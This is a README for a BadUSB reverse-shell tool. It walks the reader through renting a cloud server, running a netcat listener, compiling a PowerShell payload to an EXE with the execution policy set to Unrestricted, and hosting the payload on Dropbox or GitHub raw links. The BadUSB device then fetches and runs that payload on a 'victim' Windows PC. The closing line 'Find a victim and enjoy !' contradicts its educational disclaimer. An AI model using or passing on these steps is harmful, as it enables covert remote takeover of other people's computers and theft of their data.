Everything in this repository is strictly for educational purposes. Notice I am not responsible for stolen data. You are responsible for your actions using developed script for BadUSB.
This script allows you to take control of a PC with reverse shell attack.
Sometimes, you will see something like this :
This is only to write these characters : "@", "\". But it depends on the computer's layout, so adapt these characters thanks to this site and the sequence you actually use to wirte these characters with your keyboard. (or switch the keyboard layout to French).
For US layout you only have to replace by this for "\" :
And by this for "@" :
You can customize the delay according to the speed in which you plug the BadUSB.
When you plug the BadUSB in a PC you have to wait for the caps lock to flash to unplug it.
Have a BadUSB.
Install Arduino software here (if you use a BadUSB which is based on arduino);
Have a victim with Windows OS installed in his PC;
Create an account here;
Go to create, linode;
Select Ubuntu 18.04 LTS distribution;
Select the region closest to where you live;
Select shared CPU, Nanode 1GB;
Choose your server label and password;
Create linode;
Now open a terminal and type the ssh access command (ssh root@your_ssh_ip_adress);
You are now connected to your ssh server;
To make your ssh server always listening type this commands :
nc -lnvp 87 -s your_ssh_ip_adress
Your ssh server is now listening and you can exit;
To resume your listening screen, just type :
screen -r
Go in this link and click on green button on right top of main page. Then click on "Download Zip" and extract zip file.
Start powershell as admin and type the following commands :
Set-Location $env:HOMEPATH\Downloads\PS2EXE-master\Win-PS2EXE
Set-ExecutionPolicy Unrestricted -Force
Import-Module ps2exe
- Select source file (the file you want to convert).
- Select target file (the directory where you want your file to be).
- Select icon file (you can download some icons here).
- Check Supress output and Suppress error output.
- Then click on compile button to finish the convertion.
- Download this repository;
Linux :
git clone https://github.com/tuconnaisyouknow/BadUSB_reverseShellInjector
cd BadUSB_reverseShellInjector
Windows : Click on green button on right top of main page. Then click on "Download Zip" and extract zip file.
Replace LINK here at line 8 and replce IP and PORT here at line 3;
Put the .ino or .txt file in your BadUSB;
Find a victim and enjoy !
- Turn off caps lock.
- Switch the keyboard layout to French (or adapt the code according to your layout).
Create a dropbox account here;
Upload your file;
Copy the link of the file and change ?dl=0 by ?dl=1;
You will get a link like this : https://dropbox.com/s/link/YOURFILE?dl=1;
Create a Github account here;
Create a public repository;
Upload your file;
Go to your file page and click on RAW button;